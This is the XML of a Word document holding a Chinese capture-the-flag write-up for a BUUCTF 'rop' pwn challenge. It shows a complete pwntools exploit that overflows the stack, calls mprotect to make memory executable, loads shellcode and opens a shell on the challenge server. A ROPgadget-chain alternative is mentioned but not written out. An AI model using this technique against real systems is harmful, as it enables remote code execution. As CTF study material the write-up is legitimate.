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27DA" w14:textId="1D4B39E9" w:rsidR="0036069E" w:rsidRDefault="0036069E" w:rsidP="0036069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先checksec一下文件</w:t>
      </w:r>
      <w:r w:rsidR="00873B1B" w:rsidRPr="00873B1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3594F6ED" wp14:editId="5C4E3438">
            <wp:extent cx="5274310" cy="1622425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1370544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9DB" w14:textId="4C392950" w:rsidR="0036069E" w:rsidRDefault="0036069E" w:rsidP="0036069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放到ida看一下一眼就可以看看到漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48640477" w14:textId="353671D4" w:rsidR="0036069E" w:rsidRDefault="0036069E" w:rsidP="0036069E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0036069E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B9B06E" wp14:editId="41ACD40B">
            <wp:extent cx="5274310" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="86259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94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0FAD" w14:textId="0A59BD48" w:rsidR="0036069E" w:rsidRDefault="0036069E" w:rsidP="0036069E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可是除了这个漏洞没有任何东西了，没有bin/sh，没有system，没有execve，没有flag，啥都没有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB383DB" w14:textId="499F41C7" w:rsidR="00873B1B" w:rsidRDefault="00873B1B" w:rsidP="00873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看了官方的wp我们有两种方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E101269" w14:textId="54A8270F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第一种是比较简单的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52770911" w14:textId="31BB209A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利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00873B1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mprotect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，修改权限来进行bin/sh的写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B757430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73F73245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6D50834A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context.log_level = 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C9A265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 = remote("node5.buuoj.cn",26356)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667E7EB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5B38D313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#sh = process('./rop')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E065C4A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#gdb.attach(sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F5B4C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792E5955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elf = ELF("./rop")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02261336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main_address = elf.symbols["main"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BB9F84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read_address = 0x806d290</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE33476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10609BD4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mprotect_address = 0x806DDA0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546E037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gai_address = 0x80e9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1493C4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0F75B4BA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payload = b"A"*(0xc+0x4) + p32(mprotect_address) + p32(main_address) + p32(gai_address) + p32(0x2000) + p32(0x7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2F40D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sh.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53795E34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721FD5AB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4A54E6B9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shellcode = asm(shellcraft.sh(),arch='i386',os='linux')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36242CBC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24D506DC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payload = b"A"*(0xc+0x4) + p32(read_address) + p32(gai_address+0x1000) + p32(0) + p32(gai_address+0x1000) + p32(len(shellcode))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B74E23E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6E182077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sh.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA25B0F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258C2298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sh.sendline(shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C17FA63" w14:textId="77777777" w:rsidR="00873B1B" w:rsidRDefault="00873B1B" w:rsidP="00873B1B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EED614A" w14:textId="77777777" w:rsidR="00873B1B" w:rsidRDefault="00873B1B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sh.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667CD5A0" w14:textId="160B42F5" w:rsidR="00873B1B" w:rsidRDefault="006434FE" w:rsidP="00873B1B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二种更简单可利用ropgadget自带的工具让他形成ropchain</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00873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607"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A26458C"/>
    <w:lvl w:ilvl="0" w:tplc="C1B25A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748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F2"/>
    <w:rsid w:val="0036069E"/>
    <w:rsid w:val="006434FE"/>
    <w:rsid w:val="00873B1B"/>
    <w:rsid w:val="008C672B"/>
    <w:rsid w:val="009B4552"/>
    <w:rsid w:val="009D13E5"/>
    <w:rsid w:val="00E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E0579"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B30FE46F-E31B-47CC-9A58-FDAEC94A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35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5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5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5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35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5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5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5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5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5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5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5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5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3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183</Words>
  <Characters>746</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>40</Lines>
  <Paragraphs>24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2026-01-20T08:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-22T13:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>